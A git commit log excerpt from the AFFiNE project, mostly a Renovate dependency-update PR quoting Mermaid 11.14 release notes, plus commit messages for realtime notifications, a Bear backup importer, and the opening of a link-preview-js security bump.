[#&#8203;7523](https://redirect.github.com/mermaid-js/mermaid/pull/7523)
[`5144ed4`](https://redirect.github.com/mermaid-js/mermaid/commit/5144ed4b138ae0f4836bab4c163c575e0a767dd3)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Arrow blocks in block-beta diagrams not spanning the
specified number of columns when using `:n` syntax.

-
[#&#8203;7262](https://redirect.github.com/mermaid-js/mermaid/pull/7262)
[`13d9bfa`](https://redirect.github.com/mermaid-js/mermaid/commit/13d9bfa4748e845a9eec7d6265ba496d2278f26e)
Thanks [@&#8203;darshanr0107](https://redirect.github.com/darshanr0107)!
- fix(block): Ensure block diagram hexagon blocks respect column
spanning syntax

-
[#&#8203;7684](https://redirect.github.com/mermaid-js/mermaid/pull/7684)
[`e14bb88`](https://redirect.github.com/mermaid-js/mermaid/commit/e14bb88bdb940124cdb0a107025653bf93745c99)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink)! -
fix: loosen `uuid` dependency range to allow v14

  Mermaid does not use any of the vulnerable code in CVE-2026-41907,
  but this allows users to silence any `npm audit` alerts on it.

-
[#&#8203;7633](https://redirect.github.com/mermaid-js/mermaid/pull/7633)
[`9217c0d`](https://redirect.github.com/mermaid-js/mermaid/commit/9217c0d8b221b423af80e420b7adae901acf6c8c)
Thanks [@&#8203;Felix-Garci](https://redirect.github.com/Felix-Garci)! -
fix(block): add support for all arrow types in block diagrams

-
[#&#8203;7587](https://redirect.github.com/mermaid-js/mermaid/pull/7587)
[`5e7eb62`](https://redirect.github.com/mermaid-js/mermaid/commit/5e7eb62e3aba6b5df559f5c839a868e5b7f40e72)
Thanks
[@&#8203;MaddyGuthridge](https://redirect.github.com/MaddyGuthridge)! -
chore: drop lodash-es in favour of es-toolkit

-
[#&#8203;7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693)
[`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba)
Thanks [@&#8203;dull-bird](https://redirect.github.com/dull-bird)! -
fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and
other non-ASCII text in unquoted axis/quadrant/point labels.

Previously the lexer only matched ASCII `[A-Za-z]+` for text tokens,
even though the grammar referenced `UNICODE_TEXT`. Bare Chinese,
Japanese, Korean, emoji, and accented Latin characters in labels caused
a parse error. Added a `[^\x00-\x7F]+` lexer rule to emit `UNICODE_TEXT`
and included it in the `alphaNumToken` grammar rule.

Fixes
[#&#8203;7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120).

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`4755553`](https://redirect.github.com/mermaid-js/mermaid/commit/4755553d5fb6d1217809e43ffb8fc54d6a73e482)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: improve D3 types for mermaidAPI funcs

-
[#&#8203;7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737)
[`6476973`](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)
Thanks
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512)! -
fix: handle `&` when namespacing CSS rules

-
[#&#8203;7520](https://redirect.github.com/mermaid-js/mermaid/pull/7520)
[`8c1a0c1`](https://redirect.github.com/mermaid-js/mermaid/commit/8c1a0c1fd19587c6772d6966fe9d217e5cd1356c)
Thanks
[@&#8203;RodrigojndSantos](https://redirect.github.com/RodrigojndSantos)!
- fix(stateDiagram): comments starting with one `%` are no longer
treated as comments

  Switch to using two `%%` if you want to write a comment.

- Updated dependencies
\[[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445),
[`675a64c`](https://redirect.github.com/mermaid-js/mermaid/commit/675a64ca0e3cde8728ca715991623c3fc055ce88)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.1

###
[`v11.14.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.14.0)

[Compare
Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.13.0...mermaid@11.14.0)

Thanks to our awesome mermaid community that contributed to this
release:
[@&#8203;ashishjain0512](https://redirect.github.com/ashishjain0512),
[@&#8203;tractorjuice](https://redirect.github.com/tractorjuice),
[@&#8203;autofix-ci\[bot\]](https://redirect.github.com/autofix-ci%5Bbot%5D),
[@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;knsv](https://redirect.github.com/knsv),
[@&#8203;kibanana](https://redirect.github.com/kibanana),
[@&#8203;chandershekhar22](https://redirect.github.com/chandershekhar22),
[@&#8203;khalil](https://redirect.github.com/khalil),
[@&#8203;ytatsuno](https://redirect.github.com/ytatsuno),
[@&#8203;sidharthv96](https://redirect.github.com/sidharthv96),
[@&#8203;github-actions\[bot\]](https://redirect.github.com/github-actions%5Bbot%5D),
[@&#8203;dripcoding](https://redirect.github.com/dripcoding),
[@&#8203;knsv-bot](https://redirect.github.com/knsv-bot),
[@&#8203;jeroensmink98](https://redirect.github.com/jeroensmink98),
[@&#8203;Alex9583](https://redirect.github.com/Alex9583),
[@&#8203;GhassenS](https://redirect.github.com/GhassenS),
[@&#8203;omkarht](https://redirect.github.com/omkarht),
[@&#8203;darshanr0107](https://redirect.github.com/darshanr0107),
[@&#8203;leentaylor](https://redirect.github.com/leentaylor),
[@&#8203;lee-treehouse](https://redirect.github.com/lee-treehouse),
[@&#8203;veeceey](https://redirect.github.com/veeceey),
[@&#8203;turntrout](https://redirect.github.com/turntrout),
[@&#8203;Mermaid-Chart](https://redirect.github.com/Mermaid-Chart),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming), Claude

### Releases

####
[@&#8203;mermaid-js/examples](https://redirect.github.com/mermaid-js/examples)@&#8203;1.2.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

#### mermaid\@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additoinal redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

####
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

####
[@&#8203;mermaid-js/tiny](https://redirect.github.com/mermaid-js/tiny)@&#8203;11.14.0

##### Minor Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Add Wardley Maps diagram type (beta)

Adds Wardley Maps as a new diagram type to Mermaid (available as
`wardley-beta`). Wardley Maps are visual representations of business
strategy that help map value chains and component evolution.

  Features:

- Component positioning with \[visibility, evolution] coordinates (OWM
format)
  - Anchors for users/customers
  - Multiple link types: dependencies, flows, labeled links
  - Evolution arrows and trend indicators
  - Custom evolution stages with optional dual labels
- Custom stage widths using
[@&#8203;boundary](https://redirect.github.com/boundary) notation
  - Pipeline components with visibility inheritance
  - Annotations, notes, and visual elements
  - Source strategy markers: build, buy, outsource, market
  - Inertia indicators
  - Theme integration

Implementation includes parser, D3.js renderer, unit tests, E2E tests,
and comprehensive documentation.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for state diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additoinal redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:20:41 +08:00
DarkSky 8cf00738c2 feat(server): realtime notification & task status (#14934)
#### PR Dependency Tree


* **PR #14934** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full realtime platform added: live notifications, comments, embedding
progress, and transcription task updates via realtime subscriptions.

* **Chores**
* Frontend switched from polling/GraphQL queries to realtime channels;
legacy query fields marked deprecated and client libs updated to use
realtime APIs.

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14934)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->


#### PR Dependency Tree


* **PR #14934** 👈
  * **PR #14936**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-10 23:21:50 +08:00
karl-kaefer ac37d07e74 feat(editor): add Bear backup import and markdown zip folder hierarchy (#14599)
## Summary

- Add Bear `.bear2bk` backup importer (TextBundle-based zip format)
- Enhance markdown zip import to preserve folder structure from zip
paths
- Add colored highlight (`<mark data-color="...">`) support to HTML
adapter

### Bear Import Details

Bear backups are zip archives of TextBundle directories. The importer:
- Parses Bear-specific markdown (highlights `==text==`, callouts `>
[!NOTE]`, inline tags `#tag`)
- Extracts creation/modification dates from `info.json` metadata
- Filters out trashed notes
- Converts Bear tags to AFFiNE tags (consolidated by root segment)
- Builds folder hierarchy from nested tag paths (e.g.,
`#work/projects/alpha`)
- Uses JSZip for lazy decompression to handle large backups without OOM

### Markdown Zip Folder Hierarchy

`importMarkdownZip` now returns `{ docIds, folderHierarchy }` instead of
just `docIds[]`, enabling the UI to recreate the zip's directory
structure as AFFiNE folders.

## Related Issues

- Implements the TextBundle-based import approach suggested in #14115 /
Discussion #14142
- Addresses folder structure preservation requested in #10003
- Partially addresses frontmatter metadata import from #11286

## Test Plan

- [ ] Import a Bear `.bear2bk` backup file via the import dialog
- [ ] Verify tags are created and assigned to documents
- [ ] Verify folder hierarchy matches Bear's nested tag structure
- [ ] Verify creation/modification dates are preserved
- [ ] Verify highlighted text and callouts render correctly
- [ ] Verify images and attachments are imported
- [ ] Import a markdown zip with nested folders, verify folder structure
is recreated
- [ ] Verify trashed Bear notes are excluded

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Bear (.bear2bk) backup import: bulk import notes, convert/dedupe tags,
create nested folders, and return imported doc IDs plus folder
hierarchy; UI import option and progress integrated.
* Markdown ZIP import now returns an optional folder hierarchy alongside
created doc IDs.

* **Bug Fixes / Improvements**
* Highlighting: mark elements validate color names, default safely, and
apply consistent background styling.

* **Chores**
  * Added runtime dependency for ZIP handling.

* **Documentation**
  * Added localization strings and i18n accessors for Bear import UI.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 11:29:40 +08:00
renovate[bot] 429e7f495d chore: bump up link-preview-js version to v4.0.1 [SECURITY] (#14917)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
